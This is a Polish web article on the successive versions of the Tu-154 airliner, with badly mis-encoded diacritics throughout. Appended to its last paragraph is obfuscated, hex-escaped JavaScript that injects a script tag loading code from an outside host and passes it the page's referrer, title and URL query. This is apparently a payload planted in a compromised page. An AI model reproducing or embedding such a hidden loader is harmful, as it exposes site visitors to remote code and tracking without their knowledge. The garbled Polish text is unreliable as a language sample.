Najpopularniejsze wersje TU-154

Tu-154 jest jednym z najwiA�kszych osiA�gniA�A� zakA�adA?w lotniczych Tupolewa. Konstrukcja byA�a oceniana przez ekspertA?w za bardzo udanA� i caA�kiem nowoczesnA�. Z uwagi na te uwarunkowania maszyny te sA�uA?yA�y do celA?w militarnych i cywilnych w niemalA?e dwudziestu paA�stwach. Jako A?e produkcja Tu-154 trwaA�a nieprzerwanie przez 33 lata, nie daA�o siA� uniknA�A� modyfikacji samolotu. Wraz z wprowadzanymi unowoczeA�nieniami technicznymi wyznaczane byA�y kolejne wersje tego Tupolewa.

W roku 1972 do uA?ytku trafiA�y pierwsze dwa odrzutowce pasaA?erskie o oznaczeniu Tu-154. ByA�y one w stanie pomieA�ciA� na pokA�adzie 167 osA?b. Jak to zazwyczaj bywa z pierwszA� seriA�, jest ona traktowana raczej w formie eksperymentu. W trakcie jej eksploatacji inA?ynierowie majA� okazjA� zweryfikowaA� zastosowane rozwiA�zania oraz wprowadziA� pewne modyfikacje. NiemalA?e trzyletnia eksploatacja doprowadziA�a do wprowadzenia na rynek kolejnej wersji. MiaA�o to miejsce w roku 1975, a samolot otrzymaA� oznaczenie Tu-154A. W tym przypadku ulepszenia poszA�y gA�A?wnie w kierunku zwiA�kszenia ciA�gu oraz zapasu paliwa. Co wiA�cej, statek powietrzny otrzymaA� rA?wnieA? dwa miejsca dla pasaA?erA?w wiA�cej.

OczywiA�cie Tu-154A nie jest ostatnim stadium rozwojowym. JuA? w dwa lata po jego prezentacji oczy mA?gA� cieszyA� Tu-154B. Ten charakteryzowaA� siA� przede wszystkim zastosowaniem o wiele nowoczeA�niejszych silnikA?w odrzutowych oraz znacznym zwiA�kszenie kabiny pasaA?erskiej. Teraz mogA�a ona pomieA�ciA� caA�e 180 osA?b. KolejnA� fantazjA� byA�a Tu-154B2. W jego przypadku modyfikacja dotyczyA�a gA�A?wnie wygody awioniki.

Rosjanie po jakimA� czasie pomyA�leli, A?e miA�o byA�oby stworzyA� wersjA� nieco bardziej nastawionA� na transport. Tak wA�aA�nie powstaA� Tu-154S. W jego przypadku warunki eksploatowania wymusiA�y rA?wnieA? zwiA�kszenie udA?wigu. NastA�pne wariacje na temat Tupolewa nie wyszA�y ze sfery prototypu. W modelach Tu-155 i Tu-156 badane byA�o zasilanie czA�A�ci lub wszystkich silnikA?w wodorem lub metanem.

W 1981 roku na proA�bA� Polskich Linii Lotniczych LOT rozpoczA�A�y siA� prace nad nowA� wersjA� Tupolewa. Po niemalA?e trzech latach pierwsze Tu-154M weszA�y do produkcji. CharakteryzowaA�y siA� one gA�A?wnie nowoczeA�niejszymi i bardziej oszczA�dnymi silnikami. DziA�ki temu udaA�o siA� automatycznie osiA�gnA�A� wiA�kszy zasiA�g.var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}